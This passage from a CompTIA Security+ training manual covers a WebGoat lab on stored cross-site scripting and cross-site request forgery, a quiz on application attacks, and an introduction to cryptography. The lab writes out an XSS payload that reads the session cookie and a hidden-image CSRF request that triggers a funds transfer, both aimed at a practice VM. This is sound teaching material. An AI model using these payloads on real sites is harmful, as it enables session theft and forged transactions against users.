Chapter 2: Understanding attacks / Module E: Application attacks

from the site to send to the attacker, or even change the user's password at the legitimate site, effectively
giving the account to the attacker.

Exercise: Examining client-side attacks


You should have just completed the "Examining SQL injection attacks" exercise. If you have not, you'll need
to start the Dojo VM and launch WebGoat. In this exercise you'll test a cross-site scripting attack against
WebGoat.
Do This How & Why

1. Start a XSS attack lesson.

a) On the left menu of WebGoat, click


Cross-site scripting (XSS).

b) Click Stage 1: Stored XSS.

A login page appears with instructions on how to perform the


attack.

c) Log into the page with user Tom


Cat and password tom.

The staff listing page opens.

d) Click Tom's name, then click View To view the user profile page. You can update any of those
Profile. fields; since the application is full of vulnerabilities, you can
even insert a malicious script into one.

2. Insert a script into Tom's user profile.

a) Click Edit Profile. The fields are all editable.

b) At the end of the Street field, type Be sure to type it exactly as shown, with all punctuation.
"><script>alert("I just
hacked your session " +
document.cookie)</scrip
t

110 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Do This How & Why

c) Click Update Profile. A message pops up with the result of that script.

d) Click OK twice, then Logout. You'll view Tom's profile from a different account.

3. View Tom's profile from Jerry's


account.

a) Log in as Jerry Mouse. His password is jerry.

b) In Jerry's staff listing page, select The same popup message appears. The XSS attack will affect
Tom Cat, then click ViewProfile. anyone who views Tom's profile page.

c) Click OK twice.

4. Begin a CSRF lesson. You'll create a malicious page that uses the victim's browser
credentials to transfer funds on a banking site.

a) In the XSS category of the This page allows you to send an email to a newsgroup, which
navigation pane, click Cross Site can be read in a browser. It helpfully allows you to include
Request Forgery (CSRF). embedded images like on any web page.

b) Examine the Parameters section in


the right pane.

Take a note of the scr and menu values. You'll need them in a
moment.

c) In the Title field, type some As an attacker you'll want as many people to open the message
appealing message title. as possible.

CompTIA Security+ Exam SY0-501 111


Chapter 2: Understanding attacks / Module E: Application attacks

Do This How & Why

d) In the Message field, type


<img src="http://localhost:8081/WebGoat/attack?
Screen=XXX&menu=YYY&transferFunds=5000" width=1 height=1 />
Instead of XXX and YYY, use the scr and menu values shown in your Parameters section.
Note: It's very easy to mess up the syntax of the attack code, so work on it in Notepad or
another text editor in case you need to enter it again.

This "image" actually commands the browser to initiate a fund transfer at the given site.

e) Click Submit.

At the bottom of the page a link to the message appears.


Anyone subscribed to the same list would also see it.

5. Test the forged message. A CSRF attack relies on getting the victims to open a
malicious page. Once they do, the attack uses credentials in an
existing web application session to perform unwanted actions.

a) Click the message link. A real CSRF attack would pass on more detailed information
to the target application, but it would be just as invisible to the
victim.

The message opens. Since you set the source width and height
to 1 pixel, there isn't even a visibly missing image.

b) Verify that the lesson completed If it did, there will be a congratulations message at the top of
correctly. the page and a green check mark in the lesson name in the
navigation pane. Otherwise, check the syntax of your message
and try again.

6. Close Firefox, then close the Dojo


VM.

112 CompTIA Security+ Exam SY0-501


Chapter 2: Understanding attacks / Module E: Application attacks

Assessment: Application attacks


1. An attack on your web application began with a long string of numbers sent to a field that's only supposed
to hold a four-digit variable. What kind of attack was it? Choose the best response.
 Buffer overflow
 Integer overflow
 LDAP injection
 XSRF

2. What application attacks directly target the database programs sitting behind web servers? Choose all that
apply.
 Command injection
 Cross-site scripting
 Session hijacking
 SQL injection
 XML injection

3. What SQL injection technique relies on unfiltered semicolons?


 Blind injection
 Signature evasion
 Stacked query
 XSRF

4. Blocking and cleaning Flash cookies is much the same as for any other browser cookies. True or false?
 True
 False

5. What XSS techniques don't require anything to actually be stored on the target server? Choose all that
apply.
 DOM based
 Persistent
 Reflective
 XSRF

6. What application vulnerability can be exploited by providing a series of normal data inputs with a specific
sequence and timing? Choose the best response.
 Buffer overflow
 Injection
 Race condition
 Request forgery

CompTIA Security+ Exam SY0-501 113


Chapter 2: Understanding attacks / Summary: Understanding attacks

Summary: Understanding attacks


You should now know:
 How to categorize attackers by motivation and resources.
 About common types of social engineering, their underlying mechanisms, and how to protect against
them.
 How to identify malware according to its payload and transmission vector, as well as how malware
hides from detection.
 About common network attacks, including probes, spoofing, redirection, DoS, password cracking,
eavesdropping, MitM, and wireless.
 About web application attacks including injection, overflow, and scripting techniques.

114 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography
You will learn:
 About the primary types of cryptography, and algorithms in common use
 About public key infrastructure (PKI) technologies

CompTIA Security+ Exam SY0-501 115


Chapter 3: Cryptography / Module A: Cryptography concepts

Module A: Cryptography concepts


Cryptography is the science of sending messages in secret code, and it's been around almost as long as
writing: the first known encrypted text is an Egyptian inscription from 1900 B.C.E, using non-standard
hieroglyphs. Today, cryptography generally means transforming digital data with complex mathematical
formulas. Not only can cryptography be used to preserve the confidentiality of data, it can also be used to
guarantee its integrity, and verify the authenticity of its sender.
You will learn:
 About cryptographic principles
 About symmetric and asymmetric encryption
 About cryptographic hashing

About encryption
The use of cryptography to protect data confidentiality is encryption. The sender scrambles data with a
mathematical formula called an encryption algorithm, and a unique key which serves the same purpose as a
password. The intended viewer has the appropriate key to decrypt the message, but to an eavesdropper
without the key, the message looks like random gibberish.

The most common method for encrypting digital messages is called a cipher. It's a formula that takes
unencrypted plaintext and turns it into unreadable ciphertext of the same length. You can contrast this with an
encryption code, where the input and output can be of different lengths; for example, a letter where certain
key words have altered meanings.

Note: Plaintext and ciphertext don't have to be literally readable text. While ciphers once were used for
written words, in digital communications the terms apply equally to text, images, or any binary file.
Like any security, ciphers can be broken or compromised. First and most obviously, the algorithm of a cipher
isn't necessarily expected to remain secret, but the key is, so a key that can decrypt a message needs to be kept
out of the wrong hands. This means it shouldn't be shared carelessly, but also that it should be hard to guess.
Another problem is that plaintext is not random. Letters in a given language don't all appear at the same rate,
and the same words and letter patterns recur especially over long messages - if these patterns hold true of the
ciphertext, it might give the attacker useful clues about the key. An attacker might even know part of the
plaintext message already, and use it to test against possible solutions. The best algorithms create
pseudorandom ciphertext, where it's very difficult to find any patterns to it unless you have the key, even if
you know part of the plaintext already.

Note:In general, the strength of any cryptographic system is described in terms of work factor. In short,
that's how computationally difficult it is to break the encryption. That depends both on the algorithm,
and the choice of key. You can also describe it in terms of how long it would take to crack, but since
computing speeds vary between equipment and over time, that's a much more subjective term. A
particular challenge in cryptography is designing and choosing algorithms which have a high work
factor for an attacker, but which are high-performance from the perspective of a legitimate user.

116 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Substitution ciphers
Modern digital cryptography uses very sophisticated ciphers, but you can understand a lot of their underlying
principles by looking at classical cryptography, ciphers used in the pre-computing era and written using
mechanical devices or just pen and paper. One basic category of classical cipher is the substitution cipher,
which simply replaces each character of a message with a different character. One of the simplest substitution
ciphers is called the Caesar cipher, so named because Julius Caesar used it for secret military correspondence.

Exam Objective: CompTIA SY0-501 6.2.6.2, 6.2.6.3


The Caesar cipher works by simply "rotating" each character through the order of the alphabet. In Caesar's
case it was three steps right in the Latin alphabet, but it's easy to do the same in English. It doesn't need to be
three places either: ROT13 is a popular modern version which rotates characters halfway, or 13 places,
through the English alphabet. To put it another way, Caesar cipher's algorithm is "rotation through the
alphabet", and the key is the number of places each character is moved.
Plaintext A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
Caesar D E F G H I J K L M N O P Q R S T U V W X Y Z A B C

ROT13 N O P Q R S T U V W X Y Z A B C D E F G H I J K L M

Plaintext All Gaul is divided into three parts


Caesar Doo Jdxo lv glylghg lqwr wkuhh sduwv

ROT13 Nyy Tnhy vf qvivqrq vagb guerr cnegf

As you can probably tell, the Caesar cipher is very weak. You might have learned it as a childhood game, but
no one would use it for keeping serious secrets today even if a computer couldn't solve it trivially. ROT13 is
more often used for things like hiding the answer of a puzzle so you won't accidentally read it until you've
given up. Partly this is because there are only 25 possible keys, and partly because it does nothing to disguise
letter frequencies or patterns. To solve these two problems, you need more sophisticated ciphers.
One way to strengthen a substitution cipher is by changing the substitution key over the course of a message -
a process called key progression. This is called a polyalphabetic cipher, and can be much more effective. An
early example is the Vigenère cipher, which uses a keyword to look up values in a table composed of all
possible Caesar ciphers. A more complicated method was the Enigma machine developed in the 1920s and
used through World War II. Allied cryptologists famously broke the Enigma encryption used by the Germans,
but more due to operational errors and captured equipment than weaknesses in the algorithms themselves.
You can even use substitution principles to make a cipher that's provably unbreakable if it's implemented
correctly. It's not even that complex. The one-time pad (OTP) is a method where the plaintext message is
combined, character by character or bit by bit, with a key composed of a string of random numbers or letter
(the OTP). For example, the OTP could have a string of numbers corresponding to which Caesar cipher you
should use for that character. It could also be a string of binary digits to be combined in a mathematical XOR
operation with corresponding bits of the message.
Even though they're theoretically unbreakable you won't see OTPs used very often, since they have
demanding requirements. The OTP must be at least as long as the plaintext message, it must be entirely
random, it can never be reused, and it must be kept secret from everyone but the sender and recipient. Failing
at any of these makes the cipher vulnerable to attack. Consequently, OTP encryption is typically limited to
particularly specialized and high-risk communications, such sensitive diplomatic or espionage purposes.

CompTIA Security+ Exam SY0-501 117


Chapter 3: Cryptography / Module A: Cryptography concepts

Transposition ciphers
In contrast with substitution ciphers, transposition ciphers leave the characters of the plaintext intact: they just
shuffle them around to leave the ciphertext unreadable. A simple example is the rail post cipher, or zigzag
cipher. You can encrypt a rail fence cipher by writing the plaintext letters in a zigzag fashion across multiple
lines of text, then assembling them into ciphertext order.
Plaintext Three may keep a secret, if two of them are dead.
Rail fence T---E---K---A---R---F---O---E---E---D
-H-E-M-Y-E-P-S-C-E-I-T-O-F-H-M-R-D-A-
--R---A---E---E---T---W---T---A---E--

Ciphertext TEKAR FOEE DHEMY EPSCE ITOFH MRDAR AEETW TAE

More sophisticated transposition ciphers use more complex scrambling formulas, or multiple sequential ones.
Some use physical grilles that can be overlaid on a page of paper, which are moved in a pattern to reveal text
in the proper order.
Transposition ciphers can't be attacked based on character frequency, and in fact don't even hide how often
different characters are used. They also naturally break up common patterns and repetitions to some extent.
On the other hand, weak transposition ciphers have a whole different issue: a decryption key that is almost but
not quite correct will create an imperfect but partially legible result. This allows an attacker to more easily
make an initial guess and refine it later. By contrast, strong encryption algorithms ensure that even a slight
change in the key ensures a completely different result.

Steganography
One problem with ciphers is that obviously encrypted messages can draw attention. This isn't always bad, at
least if your cipher and key are strong enough that no one will break it, but it at least means they know it's
there and can try. Governments or other authorities might forbid use of strong encryption; even if the
authority isn't malicious and your intent isn't criminal, this makes legitimate ciphers vulnerable to other
attackers. If an encrypted message seems valuable enough, an attacker could even physically threaten its
bearer into divulging the key. In other circumstances secrecy, such as encryption, can be seen as suspicious or
rude in itself.

Exam Objective: CompTIA SY0-501 2.2.9, 6.1.13, 6.1.28.6


Steganography is a form of cryptography that hides secret messages in seemingly innocuous information or
even out of sight entirely, so that a casual onlooker doesn't even know it's there. In classical cryptography,
steganographic messages are varied and creative; they include invisible ink written between lines of routine
messages, particular codewords or layout choices in a written message, pinpricks in paper, or even patterned
knots tied into yarn that's then woven into a garment.
Digital steganography uses analogous tricks to hide information in otherwise ordinary files. The methods
available depend on what the obvious message and file format are: a web page or other text-based document
for example could hide messages in metadata not visible when simply scanning through the document, or
even in plain sight by "blank lines" actually containing white text against a white background. For some file
formats, most viewers will simply disregard data that doesn't fit in; for example, by placing data in the right
order you can create a .jpg image file that will appear normally in a web browser or other image viewer, but
which also has .mp3 audio data which can be read by a media player just by changing the file extension.
These methods can be effective, but can suspiciously increase file size if done carelessly; they also can be
defeated easily by someone who knows where to look, especially if they know how to view the underlying
digital data.
Another popular method of steganography hides messages directly in the encoding of image or audio files.
Typically the bits used to encode a given pixel or sound sample aren't of equal importance. One pixel of a full

118 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

color RGB image is 24 bits: eight bits for red, eight for green, and eight for blue. If you take the least
significant bit from each color, in each pixel of the image, it will hardly change the look of the image at all:
even to a close analysis it might just look like a little imperfection or noise. That means assuming no
compression, for every 8 MB of images you can store up to 1 MB of secret message right in plain sight.

The right-hand image holds a hidden message.

Sometimes the security goal of steganography is to make sure that the message is visible and unalterable.
Color laser printers and copiers use a form of steganography by encoding the time and printer serial number
in fine dots invisible to the untrained eye but easily read by scanning software. Intended originally to stop the
spread of counterfeit currency, it can also be used to find the source of a document that was printed or
distributed without permission. This method was used in the discovery and arrest of a US government
contractor who leaked classified information in mid-2017.
With any form of steganography, the hidden message itself can be encrypted, or it can rely on its hidden
nature for confidentiality. Since steganography is an example of security through obscurity the latter is less
secure; then again, steganography is sometimes used where the discovery of a secret message in itself would
be as dangerous as revealing the message contents.

Note: Unlike other forms of digital encryption, steganography isn't used by most people on a daily basis,
and tools for it aren't built into most operating systems and secure protocols. For people who need to
hide the existence of sensitive data as well as its contents, there are a variety of free and open source
tools such as Steghide, OpenPuff, and OpenStego. For those seeking to find data hidden by
steganography, steganalysis tools include StegSecret, StegExpose, or simply using the same tools used
to hide it.

CompTIA Security+ Exam SY0-501 119


Chapter 3: Cryptography / Module A: Cryptography concepts

Digital encryption
It's an understatement to say that the rise of computing transformed cryptography. Obviously digital storage
and data networks changed the format of data messages, but the constantly advancing power of computers in
the 20th century also made it trivial to break most classical ciphers. At the same time, the growth of data
networks made encryption a more valuable tool than ever. Instead of only spies and diplomats really needing
to go through such lengths, everyone today regularly transmits their passwords, banking information, and
personal correspondence over networks and to devices which would otherwise be vulnerable to all sorts of
eavesdroppers.

Exam Objective: CompTIA SY0-501 6.1.28.4, 6.1.28.5, 6.1.28.7


Digital encryption can be categorized in many ways, One way to classify it is the current state of data you
need to protect.

Transport Protects data in transit, such as that being sent over the network. Since data in transit is at
encryption the greatest risk of being exposed to attack, transport encryption is popular for secure
network protocols.
Storage Protects data at rest, which is on some sort of persistent storage medium. Storage
encryption encryption can protect individual files, such as documents or databases; it can also protect
entire storage devices, such as hard drives or backup archives. It's not as ubiquitous as
transport encryption, but is commonly used in secure systems.
Memory Protects data in use, such as that in system RAM or even that being currently processed.
encryption Memory encryption is challenging to implement without hurting performance and
interoperability, but it's increasingly desirable to organizations with strict security needs.
Cryptographic Protects the code of a program itself from those who would try to reverse engineer it,
obfuscation without changing its functions. Unlike storage or memory encryption, obfuscation affects
the source code of the program itself. Obfuscation of some sort or another is often used by
malware trying to hide itself from scanners, but the concept also has value in solving many
other problems in software security. Cryptographically secure obfuscation that will work
for all programs has been mathematically proven to be impossible, but there are ongoing
advancements in obfuscation that's strong enough to give meaningful protection in at least
some cases.

Another way you can classify digital cryptography is by how the algorithm acts on the data.

Symmetric Uses a single key to encrypt and decrypt data. Also known as secret-key or private key
encryption cryptography, since it provides confidentiality but only as long as the key is kept secret.
Asymmetric Uses two mathematically-related keys: data encrypted with one can only be decrypted
encryption with the other. Also known as public key cryptography, since one key can be shared with
the public without compromising the security of the other. Asymmetric cryptography can
be used to provide authenticity as well as confidentiality.
Cryptographic Converts data into a hash, or unique signature. The hash can't be turned back into the
hashing original data, but can be compared to the data to verify its integrity and/or authenticity.

Modern cryptosystems tend to be fairly complex and interrelated suites, using different methods, protocols,
and algorithms to achieve a set of security goals. For example, to establish a SSL/TLS connection for a secure
web connection you need a cipher suite including all three types of algorithm as well as a pseudorandom
number generator. A robust cryptosystem can protect the entire CIA triad under a wide variety of
circumstances while remaining transparent to the user. A flawed one can put your data at constant risk while
giving you a false sense of security.

120 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Confusion and diffusion


As a simple view of classical cryptography shows, designing a secure cipher isn't easy. One important factor
is that it should never be apparent how "close" an incorrect key is to the correct one. Otherwise an attacker
can just make guesses and narrow them down until they get the right one. Another is that even if an attacker
knows some of the plaintext contents of a message, comparing that against the ciphertext shouldn't give any
useful insights as to the key.

Exam Objective: CompTIA SY0-501 6.1.10, 6.1.11


Two of the primary principles used to overcome these problems today were first spelled out in "
Communication Theory of Secrecy Systems, 1949 paper by the mathematician and cryptographer Claude
Shannon which is considered one of the foundational documents of modern cryptography.

Confusion Making the mathematical relationship between the plaintext and the key as complex as
possible, so that a partially correct key is useless to an attacker. In particular, every bit or
character of the plaintext should be acted upon by more than one bit or character of the key. In
a cipher with very strong confusion, changing a single bit of the key might change half the bits
of the entire ciphertext.
Diffusion Breaking up patterns in the plaintext so they won't be at all apparent in the ciphertext, so that
known plaintext contents won't be useful in decoding the ciphertext. In a cipher with very
strong diffusion, changing a single bit of the plaintext might change half the bits of the entire
ciphertext.

Encryption algorithms today tend to be mathematically complex ciphers, relying on a combination of


substitution and transposition methods to create ciphertext that's diffuse enough to be hard to distinguish from
random data, and confused enough that it's very computationally expensive to decode without the key. An
ideal cipher is designed to be vulnerable only to brute force attacks which try every possible key in sequence,
and uses keys long and complex enough that even a determined attacker with a lot of computing resources
can't mount such an attack in a reasonable amount of time.
While there are exceptions, today encryption is usually used openly according to common standard
algorithms and protocols, often tightly integrated with existing software applications and standards. Unless
you're a cryptographer or a spy you're probably not going to have to worry about the exact mathematics being
used and you don't really need to hide the fact that you're encrypting data; you just need to make sure you're
using appropriate types of encryption with keys strong enough to suit your security needs.

Note: You might have noticed that a classical "unbreakable" OTP doesn't actually use either confusion
or diffusion: every bit of the plaintext corresponds to a single bit of the key to produce a single bit of
ciphertext. In the same paper, Shannon proved that such a OTP is unbreakable specifically because it
uses (and absolutely never reuses) an arbitrarily long, truly random key. Only a cipher that meets those
requirements is unbreakable. Since almost every other form of encryption relies on keys that are finite,
pseudorandom, and/or reused, it needs confusion and diffusion to strengthen it.

CompTIA Security+ Exam SY0-501 121


Chapter 3: Cryptography / Module A: Cryptography concepts

XOR functions
You're not going to encrypt or decrypt data by hand, and you'll probably never need to know the detailed
mathematics behind encryption algorithms. At the same time, it's easier to understand how plaintext,
ciphertext, and keys can be combined or transformed.

Exam Objective: CompTIA SY0-501 6.2.6.1


One of the most common mathematical operations used in encryption is the exclusive OR (XOR) function.
Like any Boolean function used in digital systems, it receives inputs based on binary values, and outputs a
single binary value. In XOR's case, the output is true, or 1, only if the inputs are different. If they're the same,
it's false, or 0.
0 + 0 = 0
0 + 1 = 1
1 + 0 = 1
1 + 1 = 0

For a simple demonstration of how XOR can be used in cryptography, imagine that Alice is sending a digital
message using a one-time pad, Both the initial plaintext and the keystream in the pad are binary bits, so she
can combine them in an XOR operation.
Plaintext: 01000011 10100010
Keystream: 10010111 11001000
Ciphertext: 11010100 01101010

One feature of XOR transformations is their symmetry. Since Bob has his own copy of the same keystream in
his own one-time pad, by starting at the same spot he can compare it to the ciphertext and learn the original
plaintext.
Ciphertext: 11010100 01101010
Keystream: 10010111 11001000
Plaintext: 01000011 10100010

Note: For anything other than a one-time pad, an XOR transformation alone isn't very secure since it
doesn't really add any confusion or diffusion, but it's commonly used as one step of a more complex
encryption or decryption algorithm.

Key strength
In general, the work factor of any encryption depends both on the algorithm, and the choice of key.
Encryption keys aren't synonymous with passwords, but the two have a lot in common, and often are directly
interrelated. Like a password, the longer and harder a key is to guess, the more secure it is., so key strength is
often described in terms of its length, such as 128-bit. Unlike a password, a key is usually of a fixed length
depending on the encryption algorithm, and isn't intended to be manually remembered or entered by a human.
The latter means that many algorithms generate keys without human input, using a random or pseudorandom
number generator.

Exam Objective: CompTIA SY0-501 6.1.16, 6.1.28.1, 6.1.28.2, 6.1.28.9, 6.4.2.5


Assuming the key is generated randomly and the algorithm has no flaws, a key can be guessed only by brute
strength attacks. For a key that's n bits long, there are 2n possible combinations. For a long time a 56-bit DES
key was considered strong: such a key has 256, or 72,057,594,037,927,936 possible values. As computing
power advanced, this rapidly became inadequate: by the end of the 1990s a desktop computer could break a
56-bit key in little more than a day. Fortunately, every bit you add doubles the strength of the key. Today, a
128-bit AES key is considered strong encryption for most purposes. Barring any other flaws, that means 3.4 x
1038 possible solutions: enough to keep a modern supercomputer busy for longer than the universe has existed.
That's not a reason to call encryption "finished": advances in quantum computing are just one thing that could
make even a perfect 128-bit key vulnerable.

122 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Also, like passwords or their physical namesakes, keys can be lost or stolen, leaving data compromised or
inaccessible.
 Key storage is the most obvious problem: encryption keys must be held somewhere, especially when
they're not in the form of human-readable passwords. Keeping stored keys from being accessed and
used by unauthorized users or programs is an important part of any secure cryptosystem.
 Secure key exchange between parties in an encrypted conversation is even more of a challenge, which
different implementations solve in different ways.
 Another problem is key escrow, when encryption keys are shared with a third party. Sometimes this is
for the user's benefit, like backing up the key for an encrypted drive in case it's lost; other times key
escrow might be required by an employer or government agency to protect the organization's interests.
Either way, more people in on any secret, however well-intentioned they might be, means more
chances for the secret to be compromised.

Note: At some point, everyone learning about cryptography wonders, "why not just encrypt everything
with stupidly long keys so even future supercomputers can't crack them?", but there are a couple
answers to that. One is that encryption and decryption are computationally expensive even with keys,
and longer keys mean slower throughput and higher latency especially on low-power devices.
Sometimes specialized hardware is used to accelerate encryption or decryption: this speeds things up,
but also makes it harder to upgrade to new algorithms or even just larger keys. The other reason is that
the criminal, military, and espionage uses for cryptography have caused many governments to restrict
civilian use of strong encryption. In particular, during the Cold War the US government classified
encryption technologies as military munitions and imposed strict rules on their use and export. These
rules were gradually loosened (but not entirely eliminated) as encryption became a key part of civilian
communications, but with so much computing technology designed in and distributed from the US, they
made a strong mark on developing standards and older protocols.

Algorithm choice
Even if you choose a long random key, most algorithms aren't perfect. Some have mathematical flaws that an
attacker can exploit: a flawed 128-bit key that can be guessed as easily as a flawless 64-bit key is effectively
only 64 bits, and not very secure at all today. Remember, every bit you remove from a key's effective strength
means it halves the time needed to crack it. Related to that, different types of encryption require different key
lengths. In particular, the particular mathematics of asymmetric encryption means that keys have to be longer
- a 1024-bit asymmetric key might be only as strong as an 80-bit symmetric key. Older algorithms in
particular commonly only support short keys that make them easier to break, whether or not they have
mathematical flaws on top of that.

Exam Objective: CompTIA SY0-501 6.1.7, 6.1.19, 6.1.23, 6.1.27, 6.1.28.3


Even if the algorithm itself is sound, the particular implementation might have flaws. This is especially the
case when it comes to key generation, since ideal keys are as close to random as possible, and truly random
numbers are surprisingly difficult to generate on a computer. A pseudorandom number generator is usually
good enough for effective cryptography, but only if it's used correctly. Coding errors, careless shortcuts, or
even deliberate backdoors written into the software can create weak keys that attackers could exploit.
Algorithms and implementations alike vary in their resilience against complex cryptographic attacks. Known
plaintext or sufficiently large quantities of ciphertext can make attacks easier, and sometimes just one secret
being leaked can compromise an entire cryptosystem. There are even side channel attacks designed to scout
out potential vulnerabilities in an unknown implementation or secret algorithm without directly trying to
crack it. Strongly resilient cryptography is designed so that a partial compromise of confidentiality won't
make the whole system collapse.
When you choose encryption methods you'll have to consider a number of factors, including available
protocols, industry standards, and relative performance of different algorithms. Also, consider how well-
proven the technology is. Cryptographers love nothing more than to study algorithms and their specific

CompTIA Security+ Exam SY0-501 123


Chapter 3: Cryptography / Module A: Cryptography concepts

implementations, trying to tear them apart and find every potential flaw. For them, discovering and publishing
a flaw in a cryptosystem, especially a popular one, isn't just a personal victory but a professional achievement
that can lead to industry status and job offers. This means that even if a popular and well-established
cryptographic technology isn't the strongest available, it's probably easy for you to perform a little research to
understand its flaws and avoid unpleasant surprises. Lesser-known tools and secret algorithms by contrast are
likely to have more uncorrected flaws which attackers might learn, or already know. This makes security
through obscurity particularly dangerous for cryptography.

Cryptographic modules
Cryptography is difficult and exacting. If you're an application developer who wants to encrypt data for
storage or transport, you can't afford a weak encryption implementation that leaves data vulnerable or reduces
performance. If you're using someone else's application for encryption, you need to know that they didn't
make mistakes implementing it, or that someone didn't tamper with its encryption functions. Fortunately,
every application using encryption doesn't need to have its own internal encryption/decryption engine.
Instead, the application can simply select the algorithm it wants to use and hand off the actual work to a
separate cryptographic module that actually implements the algorithm.

Exam Objective: CompTIA SY0-501 6.1.25


Any application using encryption can connect to a cryptographic module using a standard programming API;
the application specifies the algorithm it wants to use, and the module does the work, just like any other
external library. The module itself could be purely a software library, or it might interface with hardware
devices such as cryptographic accelerators or key generators. For instance, a cryptographic module can be
built into a smart card with its own internal keys and cryptographic processor. To make sure a module is
authentic and hasn't been tampered with, it can be cryptographically signed by a certifying body.
Standards for cryptographic modules vary, but remember that a module must both conform to the standards of
the application calling it, and the cryptographic quality standards of the certifying body. For example,
Microsoft operating systems and applications use the Microsoft CryptoAPI (CAPI) to provide encryption
services for applications. A CAPI module is called a cryptographic service provider (CSP) and must be
digitally signed by Microsoft. Windows verifies the signature of each CSP when it's first loaded and
periodically thereafter to make sure it hasn't been changed.
In the US and Canada, government and private regulations commonly call for cryptographic modules to be
validated according to the FIPS 140-2 standard published by NIST. FIPS 140-2 defines four security levels
for cryptographic modules, and validated products are approved for use in sensitive but unclassified
applications.

Discussion: Cryptography basics


1. What are the main relative weaknesses of classical substitution ciphers vs. transposition ciphers?
Since useful data (like text) is non-random, it's hard for a substitution cipher to hide common character
patterns and frequencies, making them vulnerable to attack. Transposition ciphers don't have that
problem, but a partially correct key might reveal just enough of the ciphertext to help an attacker finish
the job.
2. If one-time pads are so low-tech but so secure, why aren't we using them all the time?
Possible reasons include that the key has to be at least as long as the message, it needs to be completely
random, and it has to be somehow shared between two parties while being kept completely secret from
everyone else.
3. Has there ever been a time steganography would have been useful to you? If not, what future situation
might make it come in handy?
Answers may vary, but hopefully don't include criminal activity.
4. What might be a problem with a cipher that has high confusion but low diffusion? What about the
reverse?

124 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

A message encoded with a low-diffusion cipher may have recognizable patterns so that if you know some
of its contents you can easily decipher the rest. A low-confusion cipher has a simple relationship between
the ciphertext and the key, so if you have a partially key you can more easily narrow down to the correct
one.
5. If time allows, browse to http://www.dcode.fr/enigma-machine-cipher. It's an online
example of the Enigma machine, one of the most famous and elaborate cryptographic devices before
digital cryptography was invented.

Symmetric encryption
Most of the time, data is encrypted using symmetric ciphers, algorithms that use the same key to encrypt and
decrypt data in much the same way as a classical cipher. The chief advantage of symmetric-key cryptography
is that it's possible to achieve high security with a fairly short key and limited computational complexity, so
it's relatively easy to encrypt large amounts of data for either transport or storage. The chief disadvantage is
that the key must be kept secret to avoid compromising security—for this reason, symmetric encryption is
often called secret-key or private-key cryptography.

Exam Objective: CompTIA SY0-601 6.1.1, 6.1.15


Symmetric ciphers can categorized by how they encrypt data, either a bit at a time in a stream, or in blocks of
a discrete size.

 Stream ciphers operate in a fashion analogous to a one-time pad. To encrypt, the plaintext is compared
bit by bit to a corresponding keystream made from the key. To decrypt, the process is reversed. Stream
ciphers tend to be very high-performance and are well-suited to data streams of arbitrary length, like
network communication. However, the nature of a finite length encryption key means that they can
never be as secure as a one-time pad; in fact, they're particularly vulnerable to certain attacks unless
very carefully designed.
 Block ciphers encrypt plaintext in fixed-size blocks, applying the complete key to each block. The key
and block sizes don't need to be the same, but the important thing is that all the data must be broken up
into the algorithm's block size, typically 64 or 128 bits. If there's not enough data to fill a whole block,
additional padding must be added to round out the size. Block ciphers are well-suited to bulk storage,
like encrypted drives, but since the blocks are fairly short they're easy to adapt to communications as
well. While this has more processing overhead than using a stream cipher, it's easier to keep secure.

CompTIA Security+ Exam SY0-501 125


Chapter 3: Cryptography / Module A: Cryptography concepts

Semantic security
One of the reasons why a one-time pad can be perfectly secure is that the key is as long as the plaintext and
no part of it ever gets reused. This means that even if the plaintext frequently repeats the same data sequence,
each repetition is encoded differently and produces different ciphertext—so different, in fact, that there's no
way an attacker can tell the difference between the ciphertext of a plaintext sequence that's repeated a hundred
times, and that of a hundred unique plaintext sequences of the same size. This property is called semantic
security, and it's essential for a truly secure cryptosystem. Without it, an attacker can collect data over time
and look for patterns that will reveal more about the underlying plaintext and enable any number of other
attacks.

Exam Objective: CompTIA SY0-501 6.1.14


For a rather visible example, imagine you're emailing confidential images using a block cipher that simply
encrypts every block of data with the same key. It's a strong key, so what's the harm?

This uncompressed image has large areas of flat color. In the actual bitstream of
Plaintext
the file, this translates to long strings of repeated data.
Even though the key's fairly strong, it's applied the same way to each block of
Semantically insecure
data in the image. Since the image has a lot of repeating data, and thus repeating
ciphertext
blocks, the ciphertext doesn't actually hide the overall nature of the image.
This ciphertext actually uses the same key as the previous one; the difference is
Semantically secure
that it applies the key differently to each block. That way, even long stretches of
ciphertext
repeated color are broken up into seemingly random noise.

126 CompTIA Security+ Exam SY0-501


Chapter 3: Cryptography / Module A: Cryptography concepts

Block cipher modes


A challenge of cipher design is how to apply the key differently over time in a way that's methodical and
predictable enough to be reliably decrypted, without producing any obvious patterns. This in itself requires an
algorithm. For block ciphers, these algorithms are called modes of operation. A variety of modes are
available, depending on the particular encryption protocol in use. Some common ones include:

Exam Objective: CompTIA SY0-501 6.1.2, 6.1.5, 6.2.2

Electronic Code Applies the key the same way to each block. ECB is the simplest method, but as you've
Book (ECB) seen it can't provide semantic security. It's fine for a single-block message, but the
longer the message is the less secure it becomes.
Cipher Block Performs an XOR operation on each block of plaintext using the previous block of
Chaining (CBC) ciphertext, then encrypts it with the key. Additionally, the first block must be combined
with a random or pseudorandom initialization vector (IV). This way, even multiple
encryptions of the same entire message won't produce the same ciphertext. A corrupted
or missing block or IV will prevent decryption of the subsequent block, but not
following blocks; this can be good or bad, depending on the application.
Cipher FeedBack Similar to CBC, but designed to operate more like a stream cipher. CFB makes it easy
(CFB) to encrypt a stream of values smaller than a block, without additional padding.
Output FeedBack Similar to CFB, but with some differences in how the encoding shifts over time.
(OFB) Compared to CFB, OFB can easily correct ciphertext errors, but this also opens it to
some attacks. It can't correct for IV errors, or missing/added bits.
Counter (CTR) Also creates a stream cipher, but each block's encryption uses a successively
incrementing counter. It has some efficiency advantages over other methods, and if used
properly doesn't sacrifice security.
Galois Counter Combines Counter mode with a hash-based authentication code to improve integrity.
Mode (GCM) While it's difficult to actually implement in code, it's very fast and secure in practice

Initialization vectors, and the way they're used, are very important for security, but they have different
security requirements than keys. The IV doesn't need to be secret; in fact, it's often transmitted in the clear at
